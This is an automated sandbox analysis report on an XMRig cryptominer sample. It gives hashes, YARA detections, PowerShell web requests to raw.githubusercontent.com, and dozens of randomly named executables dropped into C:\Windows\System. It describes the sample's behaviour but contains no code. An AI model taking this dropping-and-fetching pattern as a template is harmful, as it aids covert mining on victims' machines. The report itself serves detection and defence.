xmrig | 5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238

Analysis

max time kernel
152s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
27/06/2024, 21:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
Size

3.2MB
MD5

4d73393c336a0f32a77d289a7735212d
SHA1

77aac8942efb54e3f10626a1ef1bb48eedfecede
SHA256

5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238
SHA512

8647edf0b5e9cd7e32c96c0031f041cb29245192c39425dd3e8c414a155618ddf1ba67004ffd3d376a83ffcffeda08b23c576d61aa14e85ffaf8357dcdc394e4
SSDEEP

98304:71ONtyBeSFkXV1etEKLlWUTOfeiRA2R76zHrW9:7bBeSFkJ

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables containing URLs to raw contents of a Github gist 64 IoCs

resource	yara_rule
behavioral2/memory/4968-0-0x00007FF6F9310000-0x00007FF6F9706000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000f000000023253-6.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/448-8-0x00007FF6B4BF0000-0x00007FF6B4FE6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0008000000023263-17.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023265-16.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0008000000023264-33.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0008000000023261-40.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0008000000023266-45.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023267-48.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023269-60.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002326a-64.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002326b-69.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023270-98.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023273-109.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023275-117.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023278-135.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002327a-145.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023280-177.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002327f-173.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002327e-165.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002327d-160.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002327c-155.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002327b-150.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023279-140.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023277-130.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023276-128.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023274-118.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023272-105.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023271-102.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002326f-90.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002326e-86.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002326d-83.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x000700000002326c-75.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/files/0x0007000000023268-55.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2744-755-0x00007FF612AB0000-0x00007FF612EA6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1484-759-0x00007FF6A3860000-0x00007FF6A3C56000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1420-760-0x00007FF73B6B0000-0x00007FF73BAA6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2376-761-0x00007FF65E600000-0x00007FF65E9F6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1524-762-0x00007FF7EDEA0000-0x00007FF7EE296000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/5040-767-0x00007FF68BC90000-0x00007FF68C086000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1708-771-0x00007FF6D50E0000-0x00007FF6D54D6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3112-769-0x00007FF655B00000-0x00007FF655EF6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2176-790-0x00007FF69A530000-0x00007FF69A926000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3956-796-0x00007FF7B7350000-0x00007FF7B7746000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3128-804-0x00007FF72E9A0000-0x00007FF72ED96000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/404-807-0x00007FF63B720000-0x00007FF63BB16000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2172-810-0x00007FF79EAD0000-0x00007FF79EEC6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1508-815-0x00007FF7AA840000-0x00007FF7AAC36000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/952-826-0x00007FF6EF0C0000-0x00007FF6EF4B6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/228-834-0x00007FF75E600000-0x00007FF75E9F6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1416-838-0x00007FF6AD450000-0x00007FF6AD846000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/492-819-0x00007FF715670000-0x00007FF715A66000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1176-818-0x00007FF648B80000-0x00007FF648F76000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2284-801-0x00007FF785A30000-0x00007FF785E26000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1608-784-0x00007FF61AEB0000-0x00007FF61B2A6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3152-780-0x00007FF64F2A0000-0x00007FF64F696000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1212-776-0x00007FF683960000-0x00007FF683D56000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/448-1437-0x00007FF6B4BF0000-0x00007FF6B4FE6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/952-1455-0x00007FF6EF0C0000-0x00007FF6EF4B6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2744-1465-0x00007FF612AB0000-0x00007FF612EA6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/228-1479-0x00007FF75E600000-0x00007FF75E9F6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1416-1478-0x00007FF6AD450000-0x00007FF6AD846000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1484-1508-0x00007FF6A3860000-0x00007FF6A3C56000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1420-1514-0x00007FF73B6B0000-0x00007FF73BAA6000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

UPX dump on OEP (original entry point) 64 IoCs

resource	yara_rule
behavioral2/memory/4968-0-0x00007FF6F9310000-0x00007FF6F9706000-memory.dmp	UPX
behavioral2/files/0x000f000000023253-6.dat	UPX
behavioral2/memory/448-8-0x00007FF6B4BF0000-0x00007FF6B4FE6000-memory.dmp	UPX
behavioral2/files/0x0008000000023263-17.dat	UPX
behavioral2/files/0x0007000000023265-16.dat	UPX
behavioral2/files/0x0008000000023264-33.dat	UPX
behavioral2/files/0x0008000000023261-40.dat	UPX
behavioral2/files/0x0008000000023266-45.dat	UPX
behavioral2/files/0x0007000000023267-48.dat	UPX
behavioral2/files/0x0007000000023269-60.dat	UPX
behavioral2/files/0x000700000002326a-64.dat	UPX
behavioral2/files/0x000700000002326b-69.dat	UPX
behavioral2/files/0x0007000000023270-98.dat	UPX
behavioral2/files/0x0007000000023273-109.dat	UPX
behavioral2/files/0x0007000000023275-117.dat	UPX
behavioral2/files/0x0007000000023278-135.dat	UPX
behavioral2/files/0x000700000002327a-145.dat	UPX
behavioral2/files/0x0007000000023280-177.dat	UPX
behavioral2/files/0x000700000002327f-173.dat	UPX
behavioral2/files/0x000700000002327e-165.dat	UPX
behavioral2/files/0x000700000002327d-160.dat	UPX
behavioral2/files/0x000700000002327c-155.dat	UPX
behavioral2/files/0x000700000002327b-150.dat	UPX
behavioral2/files/0x0007000000023279-140.dat	UPX
behavioral2/files/0x0007000000023277-130.dat	UPX
behavioral2/files/0x0007000000023276-128.dat	UPX
behavioral2/files/0x0007000000023274-118.dat	UPX
behavioral2/files/0x0007000000023272-105.dat	UPX
behavioral2/files/0x0007000000023271-102.dat	UPX
behavioral2/files/0x000700000002326f-90.dat	UPX
behavioral2/files/0x000700000002326e-86.dat	UPX
behavioral2/files/0x000700000002326d-83.dat	UPX
behavioral2/files/0x000700000002326c-75.dat	UPX
behavioral2/files/0x0007000000023268-55.dat	UPX
behavioral2/memory/2744-755-0x00007FF612AB0000-0x00007FF612EA6000-memory.dmp	UPX
behavioral2/memory/1484-759-0x00007FF6A3860000-0x00007FF6A3C56000-memory.dmp	UPX
behavioral2/memory/1420-760-0x00007FF73B6B0000-0x00007FF73BAA6000-memory.dmp	UPX
behavioral2/memory/2376-761-0x00007FF65E600000-0x00007FF65E9F6000-memory.dmp	UPX
behavioral2/memory/1524-762-0x00007FF7EDEA0000-0x00007FF7EE296000-memory.dmp	UPX
behavioral2/memory/5040-767-0x00007FF68BC90000-0x00007FF68C086000-memory.dmp	UPX
behavioral2/memory/1708-771-0x00007FF6D50E0000-0x00007FF6D54D6000-memory.dmp	UPX
behavioral2/memory/3112-769-0x00007FF655B00000-0x00007FF655EF6000-memory.dmp	UPX
behavioral2/memory/2176-790-0x00007FF69A530000-0x00007FF69A926000-memory.dmp	UPX
behavioral2/memory/3956-796-0x00007FF7B7350000-0x00007FF7B7746000-memory.dmp	UPX
behavioral2/memory/3128-804-0x00007FF72E9A0000-0x00007FF72ED96000-memory.dmp	UPX
behavioral2/memory/404-807-0x00007FF63B720000-0x00007FF63BB16000-memory.dmp	UPX
behavioral2/memory/2172-810-0x00007FF79EAD0000-0x00007FF79EEC6000-memory.dmp	UPX
behavioral2/memory/1508-815-0x00007FF7AA840000-0x00007FF7AAC36000-memory.dmp	UPX
behavioral2/memory/952-826-0x00007FF6EF0C0000-0x00007FF6EF4B6000-memory.dmp	UPX
behavioral2/memory/228-834-0x00007FF75E600000-0x00007FF75E9F6000-memory.dmp	UPX
behavioral2/memory/1416-838-0x00007FF6AD450000-0x00007FF6AD846000-memory.dmp	UPX
behavioral2/memory/492-819-0x00007FF715670000-0x00007FF715A66000-memory.dmp	UPX
behavioral2/memory/1176-818-0x00007FF648B80000-0x00007FF648F76000-memory.dmp	UPX
behavioral2/memory/2284-801-0x00007FF785A30000-0x00007FF785E26000-memory.dmp	UPX
behavioral2/memory/1608-784-0x00007FF61AEB0000-0x00007FF61B2A6000-memory.dmp	UPX
behavioral2/memory/3152-780-0x00007FF64F2A0000-0x00007FF64F696000-memory.dmp	UPX
behavioral2/memory/1212-776-0x00007FF683960000-0x00007FF683D56000-memory.dmp	UPX
behavioral2/memory/448-1437-0x00007FF6B4BF0000-0x00007FF6B4FE6000-memory.dmp	UPX
behavioral2/memory/952-1455-0x00007FF6EF0C0000-0x00007FF6EF4B6000-memory.dmp	UPX
behavioral2/memory/2744-1465-0x00007FF612AB0000-0x00007FF612EA6000-memory.dmp	UPX
behavioral2/memory/228-1479-0x00007FF75E600000-0x00007FF75E9F6000-memory.dmp	UPX
behavioral2/memory/1416-1478-0x00007FF6AD450000-0x00007FF6AD846000-memory.dmp	UPX
behavioral2/memory/1484-1508-0x00007FF6A3860000-0x00007FF6A3C56000-memory.dmp	UPX
behavioral2/memory/1420-1514-0x00007FF73B6B0000-0x00007FF73BAA6000-memory.dmp	UPX

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/4968-0-0x00007FF6F9310000-0x00007FF6F9706000-memory.dmp	xmrig
behavioral2/files/0x000f000000023253-6.dat	xmrig
behavioral2/memory/448-8-0x00007FF6B4BF0000-0x00007FF6B4FE6000-memory.dmp	xmrig
behavioral2/files/0x0008000000023263-17.dat	xmrig
behavioral2/files/0x0007000000023265-16.dat	xmrig
behavioral2/files/0x0008000000023264-33.dat	xmrig
behavioral2/files/0x0008000000023261-40.dat	xmrig
behavioral2/files/0x0008000000023266-45.dat	xmrig
behavioral2/files/0x0007000000023267-48.dat	xmrig
behavioral2/files/0x0007000000023269-60.dat	xmrig
behavioral2/files/0x000700000002326a-64.dat	xmrig
behavioral2/files/0x000700000002326b-69.dat	xmrig
behavioral2/files/0x0007000000023270-98.dat	xmrig
behavioral2/files/0x0007000000023273-109.dat	xmrig
behavioral2/files/0x0007000000023275-117.dat	xmrig
behavioral2/files/0x0007000000023278-135.dat	xmrig
behavioral2/files/0x000700000002327a-145.dat	xmrig
behavioral2/files/0x0007000000023280-177.dat	xmrig
behavioral2/files/0x000700000002327f-173.dat	xmrig
behavioral2/files/0x000700000002327e-165.dat	xmrig
behavioral2/files/0x000700000002327d-160.dat	xmrig
behavioral2/files/0x000700000002327c-155.dat	xmrig
behavioral2/files/0x000700000002327b-150.dat	xmrig
behavioral2/files/0x0007000000023279-140.dat	xmrig
behavioral2/files/0x0007000000023277-130.dat	xmrig
behavioral2/files/0x0007000000023276-128.dat	xmrig
behavioral2/files/0x0007000000023274-118.dat	xmrig
behavioral2/files/0x0007000000023272-105.dat	xmrig
behavioral2/files/0x0007000000023271-102.dat	xmrig
behavioral2/files/0x000700000002326f-90.dat	xmrig
behavioral2/files/0x000700000002326e-86.dat	xmrig
behavioral2/files/0x000700000002326d-83.dat	xmrig
behavioral2/files/0x000700000002326c-75.dat	xmrig
behavioral2/files/0x0007000000023268-55.dat	xmrig
behavioral2/memory/2744-755-0x00007FF612AB0000-0x00007FF612EA6000-memory.dmp	xmrig
behavioral2/memory/1484-759-0x00007FF6A3860000-0x00007FF6A3C56000-memory.dmp	xmrig
behavioral2/memory/1420-760-0x00007FF73B6B0000-0x00007FF73BAA6000-memory.dmp	xmrig
behavioral2/memory/2376-761-0x00007FF65E600000-0x00007FF65E9F6000-memory.dmp	xmrig
behavioral2/memory/1524-762-0x00007FF7EDEA0000-0x00007FF7EE296000-memory.dmp	xmrig
behavioral2/memory/5040-767-0x00007FF68BC90000-0x00007FF68C086000-memory.dmp	xmrig
behavioral2/memory/1708-771-0x00007FF6D50E0000-0x00007FF6D54D6000-memory.dmp	xmrig
behavioral2/memory/3112-769-0x00007FF655B00000-0x00007FF655EF6000-memory.dmp	xmrig
behavioral2/memory/2176-790-0x00007FF69A530000-0x00007FF69A926000-memory.dmp	xmrig
behavioral2/memory/3956-796-0x00007FF7B7350000-0x00007FF7B7746000-memory.dmp	xmrig
behavioral2/memory/3128-804-0x00007FF72E9A0000-0x00007FF72ED96000-memory.dmp	xmrig
behavioral2/memory/404-807-0x00007FF63B720000-0x00007FF63BB16000-memory.dmp	xmrig
behavioral2/memory/2172-810-0x00007FF79EAD0000-0x00007FF79EEC6000-memory.dmp	xmrig
behavioral2/memory/1508-815-0x00007FF7AA840000-0x00007FF7AAC36000-memory.dmp	xmrig
behavioral2/memory/952-826-0x00007FF6EF0C0000-0x00007FF6EF4B6000-memory.dmp	xmrig
behavioral2/memory/228-834-0x00007FF75E600000-0x00007FF75E9F6000-memory.dmp	xmrig
behavioral2/memory/1416-838-0x00007FF6AD450000-0x00007FF6AD846000-memory.dmp	xmrig
behavioral2/memory/492-819-0x00007FF715670000-0x00007FF715A66000-memory.dmp	xmrig
behavioral2/memory/1176-818-0x00007FF648B80000-0x00007FF648F76000-memory.dmp	xmrig
behavioral2/memory/2284-801-0x00007FF785A30000-0x00007FF785E26000-memory.dmp	xmrig
behavioral2/memory/1608-784-0x00007FF61AEB0000-0x00007FF61B2A6000-memory.dmp	xmrig
behavioral2/memory/3152-780-0x00007FF64F2A0000-0x00007FF64F696000-memory.dmp	xmrig
behavioral2/memory/1212-776-0x00007FF683960000-0x00007FF683D56000-memory.dmp	xmrig
behavioral2/memory/448-1437-0x00007FF6B4BF0000-0x00007FF6B4FE6000-memory.dmp	xmrig
behavioral2/memory/952-1455-0x00007FF6EF0C0000-0x00007FF6EF4B6000-memory.dmp	xmrig
behavioral2/memory/2744-1465-0x00007FF612AB0000-0x00007FF612EA6000-memory.dmp	xmrig
behavioral2/memory/228-1479-0x00007FF75E600000-0x00007FF75E9F6000-memory.dmp	xmrig
behavioral2/memory/1416-1478-0x00007FF6AD450000-0x00007FF6AD846000-memory.dmp	xmrig
behavioral2/memory/1484-1508-0x00007FF6A3860000-0x00007FF6A3C56000-memory.dmp	xmrig
behavioral2/memory/1420-1514-0x00007FF73B6B0000-0x00007FF73BAA6000-memory.dmp	xmrig

Blocklisted process makes network request 7 IoCs

flow	pid	Process
5	3408	powershell.exe
9	3408	powershell.exe
30	3408	powershell.exe
31	3408	powershell.exe
34	3408	powershell.exe
40	3408	powershell.exe
43	3408	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3408	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
448	nEaNZkv.exe
952	ePLhJyz.exe
2744	PHDBLZV.exe
228	qcAldxe.exe
1416	pJnNCuD.exe
1484	jzoGckd.exe
1420	RIMYAAk.exe
2376	kNMVEyZ.exe
1524	uyHeaIq.exe
5040	TvKOWEu.exe
3112	iDfChqj.exe
1708	zWtgLsZ.exe
1212	cvArJxS.exe
3152	VCNcbju.exe
1608	qgOVFbg.exe
2176	jMdCsYm.exe
3956	qdXWwDu.exe
2284	MtWdbcY.exe
3128	XalpoPJ.exe
404	tDfAwqo.exe
2172	JmcGIYp.exe
1508	IvRGQie.exe
1176	EnKIXDM.exe
492	ncvCfDZ.exe
3104	REIXvhO.exe
3220	njnrMLi.exe
772	zaWSTcl.exe
5032	ccJlHSZ.exe
1908	wYhfTIx.exe
1432	sgeQTxY.exe
2548	VQOoQVL.exe
4468	YPNzkZf.exe
4308	QErIiGt.exe
5112	BgIcnDT.exe
4268	hgNSbQK.exe
1436	TXXjpkd.exe
904	ZoOXYWX.exe
2040	aIfHPFF.exe
2216	obMQXPc.exe
5060	iNoHqUO.exe
1052	kDqnXGM.exe
1428	LrpubsH.exe
2948	AEQPVoB.exe
1276	pRncfsP.exe
4112	FlDXjzL.exe
3264	TAMXbDT.exe
4784	tjGpBof.exe
4972	vaptrff.exe
116	TBzcGIt.exe
4964	oZFkqxu.exe
2196	LvlsvyC.exe
3416	IMJTfyp.exe
3256	NINHNyK.exe
5124	AxEaETa.exe
5152	frEoRKQ.exe
5176	XcQcrPw.exe
5204	FsPHqla.exe
5232	QtHifhY.exe
5272	PmlqaNC.exe
5304	fZXjxwQ.exe
5320	ymNsKpV.exe
5344	OEunoRd.exe
5372	KUktyNb.exe
5412	iokSeeJ.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4968-0-0x00007FF6F9310000-0x00007FF6F9706000-memory.dmp	upx
behavioral2/files/0x000f000000023253-6.dat	upx
behavioral2/memory/448-8-0x00007FF6B4BF0000-0x00007FF6B4FE6000-memory.dmp	upx
behavioral2/files/0x0008000000023263-17.dat	upx
behavioral2/files/0x0007000000023265-16.dat	upx
behavioral2/files/0x0008000000023264-33.dat	upx
behavioral2/files/0x0008000000023261-40.dat	upx
behavioral2/files/0x0008000000023266-45.dat	upx
behavioral2/files/0x0007000000023267-48.dat	upx
behavioral2/files/0x0007000000023269-60.dat	upx
behavioral2/files/0x000700000002326a-64.dat	upx
behavioral2/files/0x000700000002326b-69.dat	upx
behavioral2/files/0x0007000000023270-98.dat	upx
behavioral2/files/0x0007000000023273-109.dat	upx
behavioral2/files/0x0007000000023275-117.dat	upx
behavioral2/files/0x0007000000023278-135.dat	upx
behavioral2/files/0x000700000002327a-145.dat	upx
behavioral2/files/0x0007000000023280-177.dat	upx
behavioral2/files/0x000700000002327f-173.dat	upx
behavioral2/files/0x000700000002327e-165.dat	upx
behavioral2/files/0x000700000002327d-160.dat	upx
behavioral2/files/0x000700000002327c-155.dat	upx
behavioral2/files/0x000700000002327b-150.dat	upx
behavioral2/files/0x0007000000023279-140.dat	upx
behavioral2/files/0x0007000000023277-130.dat	upx
behavioral2/files/0x0007000000023276-128.dat	upx
behavioral2/files/0x0007000000023274-118.dat	upx
behavioral2/files/0x0007000000023272-105.dat	upx
behavioral2/files/0x0007000000023271-102.dat	upx
behavioral2/files/0x000700000002326f-90.dat	upx
behavioral2/files/0x000700000002326e-86.dat	upx
behavioral2/files/0x000700000002326d-83.dat	upx
behavioral2/files/0x000700000002326c-75.dat	upx
behavioral2/files/0x0007000000023268-55.dat	upx
behavioral2/memory/2744-755-0x00007FF612AB0000-0x00007FF612EA6000-memory.dmp	upx
behavioral2/memory/1484-759-0x00007FF6A3860000-0x00007FF6A3C56000-memory.dmp	upx
behavioral2/memory/1420-760-0x00007FF73B6B0000-0x00007FF73BAA6000-memory.dmp	upx
behavioral2/memory/2376-761-0x00007FF65E600000-0x00007FF65E9F6000-memory.dmp	upx
behavioral2/memory/1524-762-0x00007FF7EDEA0000-0x00007FF7EE296000-memory.dmp	upx
behavioral2/memory/5040-767-0x00007FF68BC90000-0x00007FF68C086000-memory.dmp	upx
behavioral2/memory/1708-771-0x00007FF6D50E0000-0x00007FF6D54D6000-memory.dmp	upx
behavioral2/memory/3112-769-0x00007FF655B00000-0x00007FF655EF6000-memory.dmp	upx
behavioral2/memory/2176-790-0x00007FF69A530000-0x00007FF69A926000-memory.dmp	upx
behavioral2/memory/3956-796-0x00007FF7B7350000-0x00007FF7B7746000-memory.dmp	upx
behavioral2/memory/3128-804-0x00007FF72E9A0000-0x00007FF72ED96000-memory.dmp	upx
behavioral2/memory/404-807-0x00007FF63B720000-0x00007FF63BB16000-memory.dmp	upx
behavioral2/memory/2172-810-0x00007FF79EAD0000-0x00007FF79EEC6000-memory.dmp	upx
behavioral2/memory/1508-815-0x00007FF7AA840000-0x00007FF7AAC36000-memory.dmp	upx
behavioral2/memory/952-826-0x00007FF6EF0C0000-0x00007FF6EF4B6000-memory.dmp	upx
behavioral2/memory/228-834-0x00007FF75E600000-0x00007FF75E9F6000-memory.dmp	upx
behavioral2/memory/1416-838-0x00007FF6AD450000-0x00007FF6AD846000-memory.dmp	upx
behavioral2/memory/492-819-0x00007FF715670000-0x00007FF715A66000-memory.dmp	upx
behavioral2/memory/1176-818-0x00007FF648B80000-0x00007FF648F76000-memory.dmp	upx
behavioral2/memory/2284-801-0x00007FF785A30000-0x00007FF785E26000-memory.dmp	upx
behavioral2/memory/1608-784-0x00007FF61AEB0000-0x00007FF61B2A6000-memory.dmp	upx
behavioral2/memory/3152-780-0x00007FF64F2A0000-0x00007FF64F696000-memory.dmp	upx
behavioral2/memory/1212-776-0x00007FF683960000-0x00007FF683D56000-memory.dmp	upx
behavioral2/memory/448-1437-0x00007FF6B4BF0000-0x00007FF6B4FE6000-memory.dmp	upx
behavioral2/memory/952-1455-0x00007FF6EF0C0000-0x00007FF6EF4B6000-memory.dmp	upx
behavioral2/memory/2744-1465-0x00007FF612AB0000-0x00007FF612EA6000-memory.dmp	upx
behavioral2/memory/228-1479-0x00007FF75E600000-0x00007FF75E9F6000-memory.dmp	upx
behavioral2/memory/1416-1478-0x00007FF6AD450000-0x00007FF6AD846000-memory.dmp	upx
behavioral2/memory/1484-1508-0x00007FF6A3860000-0x00007FF6A3C56000-memory.dmp	upx
behavioral2/memory/1420-1514-0x00007FF73B6B0000-0x00007FF73BAA6000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
4	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\YGzeXht.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\zOCEQwH.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\teQwBnc.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\ymNsKpV.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\sMxFhaJ.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\uCzuIOb.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\ZoOXYWX.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\wSAJHqX.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\FacFrzL.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\EIRdifM.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\rehKRWL.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\iNxfLhe.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\mxSWblp.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\BlzCXDu.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\cUvUFZF.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\ZZZzqnY.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\VONCsbj.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\SOnBILX.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\jEqnybs.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\XnKTHza.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\PsIMFFq.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\axbRPTA.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\zSQkVgQ.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
File created	C:\Windows\System\qNfQRPb.exe	5490b0a440bbc96efe6f515de30c2bf14d862280dddfeb4fa179b10b7bda9238.exe
